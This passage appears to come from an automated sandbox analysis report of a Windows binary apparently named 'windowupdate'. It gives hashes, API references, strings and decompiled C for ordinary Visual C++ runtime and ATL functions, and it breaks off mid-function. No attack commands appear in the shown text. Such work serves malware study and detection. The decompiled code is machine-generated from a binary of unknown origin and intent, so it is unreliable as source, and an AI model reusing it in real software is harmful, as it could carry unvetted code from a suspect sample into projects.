                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __aligned_msize$Report
                      • String ID: DLL$MSPDB140
                      • API String ID: 4069037947-1197931371
                      • Opcode ID: ec951592a8d45425c803ddd98c5307c06eba8e95b958383b96b3d3d34587fa31
                      • Instruction ID: 3e46720c858debf2feaf1263e2c9213a649908ef3cf09552886aaf2a4742aad1
                      • Opcode Fuzzy Hash: ec951592a8d45425c803ddd98c5307c06eba8e95b958383b96b3d3d34587fa31
                      • Instruction Fuzzy Hash: FE2139B695011DABDB14DB90DC46FFA73ACDB14304F404295FA09E7181FAB19B5487B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00D32900: ___InlineInterlockedCompareExchangePointer.VCCORLIBD ref: 00D32927
                        • Part of subcall function 00D32900: GetLastError.KERNEL32 ref: 00D32935
                        • Part of subcall function 00D32900: _HRESULT_FROM_WIN32.LIBCMTD ref: 00D32943
                      • _Smanip.LIBCPMTD ref: 00D3372B
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      Strings
                      • %ls, xrefs: 00D33742
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3374E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D33723
                      • ERROR : Unable to initialize critical section in CAtlComModule, xrefs: 00D3370C
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckCompareErrorExchangeInlineInterlockedLastPointerSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in CAtlComModule
                      • API String ID: 1685745658-3641726158
                      • Opcode ID: ba28e4a80a4e7f185d24fcd670015345fabdfa966610d8b683ca1c43af0223b1
                      • Instruction ID: 951c85c2a55c17b05bbac8558953e3921bd6b2e50efcffed8ab697c558fbbf91
                      • Opcode Fuzzy Hash: ba28e4a80a4e7f185d24fcd670015345fabdfa966610d8b683ca1c43af0223b1
                      • Instruction Fuzzy Hash: 20115EB4E44208FFDB00FF98DA52BADB7B4EB01344F208498E5016B392D6B19F149BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • _Smanip.LIBCPMTD ref: 00D46025
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D46048
                      • ERROR - Object deleted before window was destroyed, xrefs: 00D46006
                      • %ls, xrefs: 00D4603C
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D4601D
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$ERROR - Object deleted before window was destroyed
                      • API String ID: 1089072215-1108591109
                      • Opcode ID: 9e80d1c7105c529cdc29f0849d29aa972dcf320b19474dd9ba465abbb043dc31
                      • Instruction ID: 0cfa65556880359d7b33aa9e7601b664f843746ff59741205ce19698405c5b5c
                      • Opcode Fuzzy Hash: 9e80d1c7105c529cdc29f0849d29aa972dcf320b19474dd9ba465abbb043dc31
                      • Instruction Fuzzy Hash: FB11A071E44309AFDB14FB98DC03F7EB764EB01B40F04052AF605A76C2E6B5950486B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 26%
                      			E00D3C110(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				intOrPtr _t15;
                      				void* _t20;
                      				void* _t30;
                      				void* _t31;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				if(_a4 != 0) {
                      					__eflags =  *_a4 - 0x2c;
                      					if(__eflags == 0) {
                      						 *((intOrPtr*)(_a4 + 0x1c)) = 0;
                      						_v8 = E00D32900(_a4 + 4, __esi, __eflags);
                      						__eflags = _v8;
                      						if(__eflags < 0) {
                      							_push("ERROR : Unable to initialize critical section in AtlWinModuleInit\n");
                      							_push(0);
                      							_push(E00D3F1E0(0xf23748));
                      							_push(E00D323B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20d9));
                      							E00D323E0(__ebx, __edi, __esi, __eflags);
                      							_t31 = _t31 + 0x10;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								_t20 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20da, 0, "%ls", 0xde40dc);
                      								_t31 = _t31 + 0x18;
                      								__eflags = _t20 - 1;
                      								if(__eflags == 0) {
                      									asm("int3");
                      								}
                      							}
                      						}
                      						_t15 = _v8;
                      					} else {
                      						_t15 = 0x80070057;
                      					}
                      				} else {
                      					_t15 = 0x80070057;
                      				}
                      				return E00DC1520(_t15, _t30 - _t31 + 0xc);
                      			}










                      Strings
                      • %ls, xrefs: 00D3C19E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3C1AA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3C17F
                      • ERROR : Unable to initialize critical section in AtlWinModuleInit, xrefs: 00D3C168
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in AtlWinModuleInit
                      • API String ID: 0-4079014719
                      • Opcode ID: 64716041adb229e4b755f872435f3e6f80564c9f46ddcb01c0e548a6d8ea0af7
                      • Instruction ID: 2ff85ce95b8c3878da919932c0d4f97fef7ace0fe584ff045e6977bf2f6a1d9d
                      • Opcode Fuzzy Hash: 64716041adb229e4b755f872435f3e6f80564c9f46ddcb01c0e548a6d8ea0af7
                      • Instruction Fuzzy Hash: FD11CE74E40308EFDB10FB99DC07B6D7720DB10704F248469F9052B283D7B59A549BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00D4DBA2(void* __ebx, void* __edi, void* __esi) {
                      				intOrPtr* _t31;
                      				void* _t48;
                      
                      				 *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + 0xfffffffffffffffc)) =  *((intOrPtr*)(_t48 - 0x34));
                      				E00D49A50(__ebx,  *((intOrPtr*)(_t48 - 0x34)), __edi, __esi,  *((intOrPtr*)(_t48 - 0x38)));
                      				 *((intOrPtr*)(E00D4C670(__ebx,  *((intOrPtr*)(_t48 - 0x34)), __edi, __esi) + 0x10)) =  *((intOrPtr*)(_t48 - 0x3c));
                      				 *((intOrPtr*)(E00D4C670(__ebx,  *((intOrPtr*)(_t48 - 0x3c)), __edi, __esi) + 0x14)) =  *((intOrPtr*)(_t48 - 0x40));
                      				_t31 =  *((intOrPtr*)(_t48 + 8));
                      				if( *_t31 == 0xe06d7363) {
                      					_t38 =  *((intOrPtr*)(_t48 + 8));
                      					if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x10)) == 3) {
                      						if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x14)) == 0x19930520) {
                      							L5:
                      							if( *((intOrPtr*)(_t48 - 0x44)) == 0 &&  *((intOrPtr*)(_t48 - 0x28)) != 0) {
                      								_t31 = E00D4B2C0(_t38,  *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x18)));
                      								if(_t31 != 0) {
                      									if( *((intOrPtr*)(_t48 - 0x48)) == 0) {
                      										 *(_t48 - 0x19) = 0;
                      									} else {
                      										 *(_t48 - 0x19) = 1;
                      									}
                      									_push( *(_t48 - 0x19) & 0x000000ff);
                      									return E00D4B0E0( *((intOrPtr*)(_t48 + 8)));
                      								}
                      							}
                      						} else {
                      							_t31 =  *((intOrPtr*)(_t48 + 8));
                      							if( *((intOrPtr*)(_t31 + 0x14)) == 0x19930521) {
                      								goto L5;
                      							} else {
                      								_t38 =  *((intOrPtr*)(_t48 + 8));
                      								if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x14)) == 0x19930522) {
                      									goto L5;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _t31;
                      			}






                      APIs
                        • Part of subcall function 00D49A50: ___vcrt_getptd.LIBVCRUNTIMED ref: 00D49A56
                        • Part of subcall function 00D49A50: ___vcrt_getptd.LIBVCRUNTIMED ref: 00D49A6C
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4DBBF
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4DBCA
                      • __IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 00D4DC20
                      • ___DestructExceptionObject.LIBCMTD ref: 00D4DC45
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Similarity
                      • API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
                      • String ID: csm
                      • API String ID: 485384042-1018135373
                      • Opcode ID: 43f3dd555d828a9f6842bfda216e3fcc1360bef38e7dd899cbb3451b7ead1d39
                      • Instruction ID: 003231f61018b9cfcbf2890769c4b366d55d41109494edc2d61713039d47d367
                      • Opcode Fuzzy Hash: 43f3dd555d828a9f6842bfda216e3fcc1360bef38e7dd899cbb3451b7ead1d39
                      • Instruction Fuzzy Hash: D4212974A01208EFCF18DFA4D084AAE7B73AFA9345F588058E8051B652C7B4DE81CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00D98780(intOrPtr _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				signed char _t13;
                      				void* _t18;
                      				void* _t24;
                      
                      				E00D66E20( &_v16, _a4);
                      				_t13 = E00D7EE40( &_v16);
                      				_t21 = _t13 & 0x000000ff;
                      				if((_t13 & 0x000000ff) == 0) {
                      					_v8 = 0;
                      				} else {
                      					_v8 = 1;
                      				}
                      				_v12 = _v8;
                      				_t27 = _v12;
                      				if(_v12 == 0) {
                      					_t18 = L00D84930(_t27, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fileno.cpp", 0x11, 0, L"%ls", L"stream.valid()");
                      					_t24 = _t24 + 0x18;
                      					if(_t18 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					return E00D98760( &_v16);
                      				} else {
                      					 *((intOrPtr*)(L00D82F70(_t21))) = 0x16;
                      					return E00D82900(L"stream.valid()", L"_fileno", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fileno.cpp", 0x11, 0) | 0xffffffff;
                      				}
                      			}










                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D9878F
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
                      • API String ID: 4219598475-3741990651
                      • Opcode ID: 884f7993c337cf95de10880664bc239cdda942a58b11e57d66251872b7f4e4e0
                      • Instruction ID: 58f177cc38eaef92e2c65fa59c14392f8af953db789d7a9bb040312ec2060314
                      • Opcode Fuzzy Hash: 884f7993c337cf95de10880664bc239cdda942a58b11e57d66251872b7f4e4e0
                      • Instruction Fuzzy Hash: 4B01B574D50308BEDF14EA94DD52BADB7B4DF41B04F344199F105262C2DEB15A48E6B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 79%
                      			E00D446E0(struct HWND__** __ecx, void* __esi, intOrPtr _a4, int _a8) {
                      				struct HWND__** _v8;
                      				void* _t10;
                      				void* _t17;
                      				void* _t27;
                      				void* _t28;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t10 = E00DC1520(IsWindow( *_v8), _t28 - _t28);
                      				_t31 = _t10;
                      				if(_t10 == 0) {
                      					_t17 = L00D84930(_t31, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x6d4, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t28 = _t28 + 0x18;
                      					if(_t17 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				E00D44630(_a4, E00DC1520(GetDlgItem( *_v8, _a8), _t28 - _t28));
                      				return E00DC1520(_a4, _t27 - _t28 + 4);
                      			}









                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D44719
                      • %ls, xrefs: 00D4470D
                      • ::IsWindow(m_hWnd), xrefs: 00D44708
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Similarity
                      • API ID: ItemWindow
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 1669990519-3692021841
                      • Opcode ID: d465640cbd8ae15be408b8ffd003ad69e058491529fe9b2235eacae4db7e64b3
                      • Instruction ID: df16c29ca0f5844e762cb1c38e255d73e32c0bc8cca9f6afbed207f8925ac2eb
                      • Opcode Fuzzy Hash: d465640cbd8ae15be408b8ffd003ad69e058491529fe9b2235eacae4db7e64b3
                      • Instruction Fuzzy Hash: AC01A275E50215AFC610FB58DC43F9EB378EB49750F504159F809A7241E671EE4087F5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D4B360(intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				intOrPtr* _v16;
                      				intOrPtr _v20;
                      				void* _t29;
                      				void* _t32;
                      				void* _t39;
                      				void* _t40;
                      
                      				_t33 =  *_a4;
                      				_v12 =  *_a4;
                      				_v8 =  *_v12;
                      				if(_v8 == 0xe0434352 || _v8 == 0xe0434f4d) {
                      					L5:
                      					if( *((intOrPtr*)(E00D4C670(_t32, _t33, _t39, _t40) + 0x18)) > 0) {
                      						_v16 = E00D4C670(_t32, _t33, _t39, _t40) + 0x18;
                      						 *_v16 =  *_v16 - 1;
                      					}
                      					return 0;
                      				} else {
                      					if(_v8 == 0xe06d7363) {
                      						 *((intOrPtr*)(E00D4C670(_t32, _t33, _t39, _t40) + 0x10)) = _v12;
                      						_v20 =  *((intOrPtr*)(_a4 + 4));
                      						_t29 = E00D4C670(_t32, _v12, _t39, _t40);
                      						_t33 = _v20;
                      						 *((intOrPtr*)(_t29 + 0x14)) = _v20;
                      						E00D89BF0(_v20);
                      						goto L5;
                      					}
                      					return 0;
                      				}
                      			}












                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B393
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B3A7
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B3B7
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B3C2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: csm
                      • API String ID: 984050374-1018135373
                      • Opcode ID: 3ee4a7db9345cb27c31518267df98c4758993a37573f358793b65d36afabddf4
                      • Instruction ID: aec0cec293db62652a4aaea1f4f385d57b7f5a4d83ba937c3306824e1924066e
                      • Opcode Fuzzy Hash: 3ee4a7db9345cb27c31518267df98c4758993a37573f358793b65d36afabddf4
                      • Instruction Fuzzy Hash: 29111B78A01208DFCB14EFA8C1855ADBBB0FF59310F1595AAD84597321D774EA40DFB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00D3C410(struct HWND__** __ecx, void* __esi, int _a4) {
                      				struct HWND__** _v8;
                      				void* _t8;
                      				void* _t13;
                      				void* _t22;
                      				void* _t23;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t8 = E00DC1520(IsWindow( *_v8), _t23 - _t23);
                      				_t26 = _t8;
                      				if(_t8 == 0) {
                      					_t13 = L00D84930(_t26, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x508, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t23 = _t23 + 0x18;
                      					if(_t13 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				return E00DC1520(E00DC1520(ShowWindow( *_v8, _a4), _t23 - _t23), _t22 - _t23 + 4);
                      			}









                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D3C449
                      • %ls, xrefs: 00D3C43D
                      • ::IsWindow(m_hWnd), xrefs: 00D3C438
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Similarity
                      • API ID: Window$Show
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 990937876-3692021841
                      • Opcode ID: 2109fa095f4085f2395e0ef7d9f8fb778a06d1154ad1bb2663da8536fef3e918
                      • Instruction ID: 39f1a459029fe23c80670e96b85c2d8df7042f93867ce90a1be794306c70d84e
                      • Opcode Fuzzy Hash: 2109fa095f4085f2395e0ef7d9f8fb778a06d1154ad1bb2663da8536fef3e918
                      • Instruction Fuzzy Hash: E0F0AF76E50316ABC620FB58AC43FAEB778DB45750F504168F909A7242E572EE0046F6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00D44DE0(struct HWND__** __ecx, void* __esi) {
                      				struct HWND__** _v8;
                      				void* _t7;
                      				void* _t12;
                      				void* _t20;
                      				void* _t21;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t7 = E00DC1520(IsWindow( *_v8), _t21 - _t21);
                      				_t24 = _t7;
                      				if(_t7 == 0) {
                      					_t12 = L00D84930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x35f, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t21 = _t21 + 0x18;
                      					if(_t12 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				return E00DC1520(E00DC1520(GetWindowLongA( *_v8, 0xfffffff0), _t21 - _t21), _t20 - _t21 + 4);
                      			}









                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D44E19
                      • %ls, xrefs: 00D44E0D
                      • ::IsWindow(m_hWnd), xrefs: 00D44E08
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Similarity
                      • API ID: Window$Long
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 847901565-3692021841
                      • Opcode ID: 305c3c5dfe700bf9ea596a61af3f1d65545bfbf49da0b26a00ce7a230f5eb454
                      • Instruction ID: ba3c3b78196b6caeab1f54b8ee2ccb34556c35d830334e72b80b6728eb149726
                      • Opcode Fuzzy Hash: 305c3c5dfe700bf9ea596a61af3f1d65545bfbf49da0b26a00ce7a230f5eb454
                      • Instruction Fuzzy Hash: B5F0F636E503266FC620BB5DAC43F5EB368EB45760F5002A8F809A7392E561DE0046F6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00D44660(struct HWND__** __ecx, void* __esi) {
                      				struct HWND__** _v8;
                      				void* _t7;
                      				void* _t12;
                      				void* _t20;
                      				void* _t21;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t7 = E00DC1520(IsWindow( *_v8), _t21 - _t21);
                      				_t24 = _t7;
                      				if(_t7 == 0) {
                      					_t12 = L00D84930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x50e, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t21 = _t21 + 0x18;
                      					if(_t12 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				return E00DC1520(E00DC1520(IsWindowVisible( *_v8), _t21 - _t21), _t20 - _t21 + 4);
                      			}









                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D44699
                      • %ls, xrefs: 00D4468D
                      • ::IsWindow(m_hWnd), xrefs: 00D44688
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Similarity
                      • API ID: Window$Visible
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 3657826678-3692021841
                      • Opcode ID: 92fc7929fd6e1c014888834fdd8e8c0c1057a21f131849caf37b9a94f0906912
                      • Instruction ID: d4d56f90b2b26824ad0cc8bc9cfcf19b1abfc02ff353a829757b61a1770b2870
                      • Opcode Fuzzy Hash: 92fc7929fd6e1c014888834fdd8e8c0c1057a21f131849caf37b9a94f0906912
                      • Instruction Fuzzy Hash: 0FF0F631E513266FD620BB58EC43F9EB378DB06710F500198F809A7342E561DE4046F6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D5B220(void* __ecx, WCHAR* _a4) {
                      				struct HINSTANCE__* _v8;
                      
                      				_v8 = LoadLibraryExW(_a4, 0, 0x800);
                      				if(_v8 == 0) {
                      					if(GetLastError() != 0x57 || E00D92BC0(_a4, L"api-ms-", 7) == 0) {
                      						return 0;
                      					} else {
                      						return LoadLibraryExW(_a4, 0, 0);
                      					}
                      				}
                      				return _v8;
                      			}

                      APIs
                      • LoadLibraryExW.KERNEL32(00D5B127,00000000,00000800,?,?,00D5B127,00000000), ref: 00D5B22F
                      • GetLastError.KERNEL32(?,?,00D5B127), ref: 00D5B243
                      • _wcsncmp.LIBCMTD ref: 00D5B259
                      • LoadLibraryExW.KERNEL32(00D5B127,00000000,00000000,?,00D5B127), ref: 00D5B26D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast_wcsncmp
                      • String ID: api-ms-
                      • API String ID: 4169583555-2084034818
                      • Opcode ID: ac18a64b2cac622833a78e6df29dc9ae4604bdbe8cf5e65309dcdc24717c2612
                      • Instruction ID: be3c7f98df7c3fde26f14d639140584eaf95cc8d941f205d4996a6b8bf4122bd
                      • Opcode Fuzzy Hash: ac18a64b2cac622833a78e6df29dc9ae4604bdbe8cf5e65309dcdc24717c2612
                      • Instruction Fuzzy Hash: B0F0BE30A40305FBDF109BA0CC0AFAD77A4EB04712F244414FD04EA280EB71EA048BB8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D537C0(intOrPtr _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				char _v24;
                      				signed int _v28;
                      				char _v32;
                      				char* _v36;
                      				char _v40;
                      				char* _v44;
                      				char _v48;
                      				char* _v52;
                      				char _v56;
                      				char* _v60;
                      				char _v64;
                      				char* _v68;
                      				char _v72;
                      				char* _v76;
                      				char _v80;
                      				char* _v84;
                      				char _v88;
